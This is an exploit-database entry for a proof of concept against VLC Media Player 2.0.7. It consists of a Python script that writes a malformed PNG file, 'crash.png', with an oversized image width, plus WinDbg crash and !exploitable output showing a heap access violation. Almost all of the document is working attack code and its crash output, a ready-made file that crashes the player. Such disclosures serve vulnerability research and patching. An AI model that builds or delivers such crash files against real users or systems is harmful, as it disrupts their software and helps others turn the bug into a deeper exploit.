VLC Media Player 2.0.7 PNG Crash PoC

vendor:
VLC Media Player
by:
Kevin Fujimoto
N/A
CVSS
N/A
Crash
Unknown
CWE
Product Name: VLC Media Player
Affected Version From: 2.0.7
Affected Version To: 2.0.7
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 7 64-bit
Unknown
VLC Media Player 2.0.7 PNG Crash PoC

This is a proof-of-concept exploit that crashes the VLC Media Player version 2.0.7 when processing PNG files.
Mitigation:

Unknown
Source
Exploit-DB raw data:

#!/usr/bin/python

# VLC Media Player 2.0.7 PNG Crash PoC
# Vendor Homepage: http://www.videolan.org/
# Version: 2.0.7
# Tested on: Windows 7 64-bit
# Author: Kevin Fujimoto

# Debug Information:
# Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
# Copyright (c) Microsoft Corporation. All rights reserved.

# *** wait with pending attach
# Symbol search path is: SRV*g:\symbols*http://msdl.microsoft.com/download/symbols
# Executable search path is: 
# ModLoad: 00400000 00425000   G:\Program Files (x86)\VideoLAN\VLC\vlc.exe
# ModLoad: 775b0000 77730000   C:\Windows\SysWOW64\ntdll.dll
# ModLoad: 750f0000 75200000   C:\Windows\syswow64\kernel32.dll
# ModLoad: 76100000 76147000   C:\Windows\syswow64\KERNELBASE.dll
# ModLoad: 623e0000 6240c000   G:\Program Files (x86)\VideoLAN\VLC\libvlc.dll
# ModLoad: 50420000 5066d000   G:\Program Files (x86)\VideoLAN\VLC\libvlccore.dll
# ModLoad: 75ab0000 75b50000   C:\Windows\syswow64\ADVAPI32.dll
# ModLoad: 76170000 7621c000   C:\Windows\syswow64\msvcrt.dll
# ModLoad: 76150000 76169000   C:\Windows\SysWOW64\sechost.dll
# ModLoad: 75210000 75300000   C:\Windows\syswow64\RPCRT4.dll
# ModLoad: 75000000 75060000   C:\Windows\syswow64\SspiCli.dll
# ModLoad: 74ff0000 74ffc000   C:\Windows\syswow64\CRYPTBASE.dll
# ModLoad: 76390000 76fda000   C:\Windows\syswow64\SHELL32.DLL
# ModLoad: 76230000 76287000   C:\Windows\syswow64\SHLWAPI.dll
# ModLoad: 75dd0000 75e60000   C:\Windows\syswow64\GDI32.dll
# ModLoad: 75ca0000 75da0000   C:\Windows\syswow64\USER32.dll
# ModLoad: 760f0000 760fa000   C:\Windows\syswow64\LPK.dll
# ModLoad: 75bf0000 75c8d000   C:\Windows\syswow64\USP10.dll
# ModLoad: 71880000 718b2000   C:\Windows\system32\WINMM.DLL
# ModLoad: 75590000 755c5000   C:\Windows\syswow64\WS2_32.dll
# ModLoad: 75300000 75306000   C:\Windows\syswow64\NSI.dll
# ModLoad: 75730000 75735000   C:\Windows\syswow64\PSAPI.DLL
# ModLoad: 75750000 75908000   C:\Windows\syswow64\WININET.DLL
# ModLoad: 75be0000 75be4000   C:\Windows\syswow64\api-ms-win-downlevel-user32-l1-1-0.dll
# ModLoad: 77580000 77585000   C:\Windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll
# ModLoad: 76220000 76224000   C:\Windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
# ModLoad: 75c90000 75c94000   C:\Windows\syswow64\api-ms-win-downlevel-version-l1-1-0.dll
# ModLoad: 74df0000 74df9000   C:\Windows\system32\version.DLL
# ModLoad: 75a40000 75a43000   C:\Windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0.dll
# ModLoad: 75740000 75743000   C:\Windows\syswow64\normaliz.DLL
# ModLoad: 75310000 75508000   C:\Windows\syswow64\iertutil.dll
# ModLoad: 75a50000 75ab0000   C:\Windows\system32\IMM32.DLL
# ModLoad: 762c0000 7638c000   C:\Windows\syswow64\MSCTF.dll
# ModLoad: 10000000 10059000   C:\Windows\SysWOW64\guard32.dll
# ModLoad: 74de0000 74de7000   C:\Windows\system32\fltlib.dll
# ModLoad: 755d0000 7572c000   C:\Windows\syswow64\ole32.dll
# ModLoad: 73d90000 73d9b000   C:\Windows\system32\profapi.dll
# ModLoad: 720f0000 72170000   C:\Windows\system32\uxtheme.dll
# ModLoad: 73cb0000 73cc3000   C:\Windows\system32\dwmapi.dll
# ModLoad: 71f50000 720ee000   C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
# ModLoad: 75060000 750e3000   C:\Windows\syswow64\CLBCatQ.DLL
# ModLoad: 75b50000 75bdf000   C:\Windows\syswow64\OLEAUT32.dll
# ModLoad: 61070000 610bc000   G:\Program Files (x86)\VideoLAN\VLC\plugins\access\libdshow_plugin.dll
# ModLoad: 5bf20000 5bf3c000   G:\Program Files (x86)\VideoLAN\VLC\plugins\audio_output\libaout_directx_plugin.dll
# ModLoad: 5bf00000 5bf1d000   G:\Program Files (x86)\VideoLAN\VLC\plugins\audio_output\libwaveout_plugin.dll
# ModLoad: 5b850000 5b874000   G:\Program Files (x86)\VideoLAN\VLC\plugins\video_output\libdirectx_plugin.dll
# ModLoad: 5b830000 5b849000   G:\Program Files (x86)\VideoLAN\VLC\plugins\mmxext\libmemcpymmxext_plugin.dll
# ModLoad: 5b7f0000 5b82f000   G:\Program Files (x86)\VideoLAN\VLC\plugins\access\liblibbluray_plugin.dll
# ModLoad: 59020000 59048000   G:\Program Files (x86)\VideoLAN\VLC\plugins\access\libaccess_bd_plugin.dll
# ModLoad: 57fb0000 58001000   G:\Program Files (x86)\VideoLAN\VLC\plugins\access\libdvdnav_plugin.dll
# ModLoad: 5b7d0000 5b7eb000   G:\Program Files (x86)\VideoLAN\VLC\plugins\access\libaccess_vdr_plugin.dll
# ModLoad: 5b760000 5b77b000   G:\Program Files (x86)\VideoLAN\VLC\plugins\access\libfilesystem_plugin.dll
# ModLoad: 50830000 508ac000   G:\Program Files (x86)\VideoLAN\VLC\plugins\stream_filter\libstream_filter_httplive_plugin.dll
# ModLoad: 50370000 50420000   G:\Program Files (x86)\VideoLAN\VLC\plugins\stream_filter\libstream_filter_dash_plugin.dll
# ModLoad: 59060000 5907a000   G:\Program Files (x86)\VideoLAN\VLC\plugins\access\libstream_filter_rar_plugin.dll
# ModLoad: 58040000 58065000   G:\Program Files (x86)\VideoLAN\VLC\plugins\access\libzip_plugin.dll
# ModLoad: 58020000 58039000   G:\Program Files (x86)\VideoLAN\VLC\plugins\stream_filter\libstream_filter_record_plugin.dll
# ModLoad: 57bb0000 57bda000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libplaylist_plugin.dll
# ModLoad: 50210000 5036f000   G:\Program Files (x86)\VideoLAN\VLC\plugins\meta_engine\libtaglib_plugin.dll
# ModLoad: 57b50000 57baa000   G:\Program Files (x86)\VideoLAN\VLC\plugins\lua\liblua_plugin.dll
# ModLoad: 500c0000 50202000   G:\Program Files (x86)\VideoLAN\VLC\plugins\misc\libxml_plugin.dll
# ModLoad: 57cd0000 57ced000   G:\Program Files (x86)\VideoLAN\VLC\plugins\control\libhotkeys_plugin.dll
# ModLoad: 57970000 57989000   G:\Program Files (x86)\VideoLAN\VLC\plugins\control\libglobalhotkeys_plugin.dll
# ModLoad: 68cf0000 697d9000   G:\Program Files (x86)\VideoLAN\VLC\plugins\gui\libqt4_plugin.dll
# ModLoad: 75510000 7558b000   C:\Windows\syswow64\COMDLG32.DLL
# ModLoad: 72230000 72281000   C:\Windows\system32\WINSPOOL.DRV
# ModLoad: 72330000 72337000   C:\Windows\system32\WSOCK32.DLL
# ModLoad: 73da0000 73db7000   C:\Windows\system32\userenv.dll
# ModLoad: 72200000 72216000   C:\Windows\system32\CRYPTSP.dll
# ModLoad: 72180000 721bb000   C:\Windows\system32\rsaenh.dll
# ModLoad: 73a60000 73a6e000   C:\Windows\system32\RpcRtRemote.dll
# ModLoad: 507d0000 50828000   G:\Program Files (x86)\VideoLAN\VLC\plugins\services_discovery\libupnp_plugin.dll
# ModLoad: 72650000 7266c000   C:\Windows\system32\IPHLPAPI.DLL
# ModLoad: 72640000 72647000   C:\Windows\system32\WINNSI.DLL
# ModLoad: 57940000 57965000   G:\Program Files (x86)\VideoLAN\VLC\plugins\services_discovery\libsap_plugin.dll
# ModLoad: 57160000 5717a000   G:\Program Files (x86)\VideoLAN\VLC\plugins\services_discovery\libpodcast_plugin.dll
# ModLoad: 56d90000 56daa000   G:\Program Files (x86)\VideoLAN\VLC\plugins\services_discovery\libmediadirs_plugin.dll
# ModLoad: 507b0000 507c9000   G:\Program Files (x86)\VideoLAN\VLC\plugins\services_discovery\libwindrive_plugin.dll
# ModLoad: 62da0000 62f0f000   C:\Windows\system32\explorerframe.dll
# ModLoad: 62d70000 62d9f000   C:\Windows\system32\DUser.dll
# ModLoad: 62cb0000 62d62000   C:\Windows\system32\DUI70.dll
# ModLoad: 730c0000 73144000   C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
# ModLoad: 77c00000 77c40000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll
# ModLoad: 77bd0000 77bf5000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libavi_plugin.dll
# ModLoad: 77ba0000 77bc2000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libasf_plugin.dll
# ModLoad: 77b80000 77b9b000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libflacsys_plugin.dll
# ModLoad: 50790000 507ab000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libes_plugin.dll
# ModLoad: 69830000 69857000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libmpc_plugin.dll
# ModLoad: 61c90000 61cab000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libnuv_plugin.dll
# ModLoad: 6bbb0000 6bbca000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libtta_plugin.dll
# ModLoad: 675f0000 6760b000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libwav_plugin.dll
# ModLoad: 6aaf0000 6abdb000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libsid_plugin.dll
# ModLoad: 69d90000 69eb8000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libmkv_plugin.dll
# ModLoad: 6ccd0000 6cd86000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\liblive555_plugin.dll
# ModLoad: 6ef10000 6ef3b000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libogg_plugin.dll
# ModLoad: 70950000 70969000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libdirac_plugin.dll
# ModLoad: 644f0000 6450a000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libsmf_plugin.dll
# ModLoad: 64370000 6438a000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\librawvid_plugin.dll
# ModLoad: 6c2c0000 6c2da000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libpva_plugin.dll
# ModLoad: 6a510000 6a53f000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libts_plugin.dll
# ModLoad: 67f30000 67f4a000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libnsv_plugin.dll
# ModLoad: 6f980000 6f999000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libau_plugin.dll
# ModLoad: 6a6e0000 6a74f000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libgme_plugin.dll
# ModLoad: 6c5e0000 6c5fa000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libvoc_plugin.dll
# ModLoad: 64810000 64829000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libxa_plugin.dll
# ModLoad: 071a0000 072ad000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libmod_plugin.dll
# ModLoad: 66c10000 66c2a000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libaiff_plugin.dll
# ModLoad: 060b0000 060cb000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libimage_plugin.dll
# ModLoad: 77b40000 77b7e000   G:\Program Files (x86)\VideoLAN\VLC\plugins\codec\libpng_plugin.dll
# (1e8c.1954): Access violation - code c0000005 (!!! second chance !!!)
# eax=072b0048 ebx=00ab0000 ecx=00000000 edx=00000000 esi=072b0040 edi=00ab0000
# eip=775eb6d8 esp=0658daf4 ebp=0658dbc4 iopl=0         nv up ei pl nz na po nc
# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
# ntdll!RtlpAllocateHeap+0x7fb:
# 775eb6d8 8b09            mov     ecx,dword ptr [ecx]  ds:002b:00000000=????????
# 0:009> !exploitable -v
# HostMachine\HostUser
# Executing Processor Architecture is x86
# Debuggee is in User Mode
# Debuggee is a live user mode debugging session on the local machine
# Event Type: Exception
# *** ERROR: Module load completed but symbols could not be loaded for G:\Program Files (x86)\VideoLAN\VLC\vlc.exe
# Exception Faulting Address: 0x0
# Second Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
# Exception Sub-Type: Read Access Violation

# Faulting Instruction:775eb6d8 mov ecx,dword ptr [ecx]

# Basic Block:
#     775eb6d8 mov ecx,dword ptr [ecx]
#        Tainted Input Operands: ecx
#     775eb6da mov edx,dword ptr [edx+4]
#     775eb6dd cmp ecx,edx
#        Tainted Input Operands: ecx
#     775eb6df jne ntdll!rtlpallocateheap+0x8e4 (7763af86)
#        Tainted Input Operands: ZeroFlag

# Exception Hash (Major/Minor): 0x65193219.0x71557302

# Stack Trace:
# ntdll!RtlpAllocateHeap+0x7fb
# ntdll!RtlAllocateHeap+0x23a
# msvcrt!_calloc_impl+0x136
# msvcrt!_calloc_crt+0x16
# msvcrt!_getbuf+0x11
# msvcrt!_flsbuf+0x94
# msvcrt!_fputwc_nolock+0xd5
# msvcrt!fputwc+0x51
# vlc+0x5975
# vlc+0x97ee
# vlc+0x700b
# msvcrt!_wsopen_s+0x1b
# msvcrt!_unlock+0x15
# msvcrt!_iob+0x60
# ntdll!ExecuteHandler2+0x26
# Instruction Address: 0x00000000775eb6d8

# Description: Data from Faulting Address controls Branch Selection
# Short Description: TaintedDataControlsBranchSelection
# Exploitability Classification: UNKNOWN
# Recommended Bug Title: Data from Faulting Address controls Branch Selection starting at ntdll!RtlpAllocateHeap+0x00000000000007fb called from msvcrt!_calloc_impl+0x0000000000000136 (Hash=0x65193219.0x71557302)

# The data from the faulting address is later used to determine whether or not a branch is taken.

out = (
       "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A" # PNG signature
       "\x00\x00\x00\x0D" # IHDR size
       "\x49\x48\x44\x52" # IHDR chunk
       "\x7F\xFF\xFF\xFF" # width
       "\x00\x00\x01\x02" # height
       "\x01" # bit depth 
       "\x03" # color type
       "\x00" # compression method
       "\x00" # filter method
       "\x00" # interlace method
       "\xBA\x1B\xD8\x84" # IHDR chunk CRC
       "\x00\x00\x00\x03" # PLTE size
	   "\x50\x4C\x54\x45" # PLTE chunk
	   "\xFF" # red
	   "\xFF" # green
       "\xFF" # blue
	   "\xA7\xC4\x1B\xC8" # PLTE chunk CRC
	   "\x00\x00\x00\x01" # tRNS size
	   "\x74\x52\x4E\x53" # tRNS chunk
	   "\x00" # alpha
	   "\x40\xE6\xD8\x66" # tRNS chunk CRC
	   "\x00\x00\x00\x01" # IDAT size
	   "\x49\x44\x41\x54" # IDAT chunk
	   "\xFF" # image data
	   "\x05\x3A\x92\x65" # IDAT chunk CRC 
	   "\x00\x00\x00\x00" # IEND size
	   "\x49\x45\x4E\x44" # IEND chunk
	   "\xAE\x42\x60\x82" # IEND chunk CRC
	   )

print "Writing file..."

file = open('crash.png', 'wb')
file.write(out)
file.close()

print "File written!"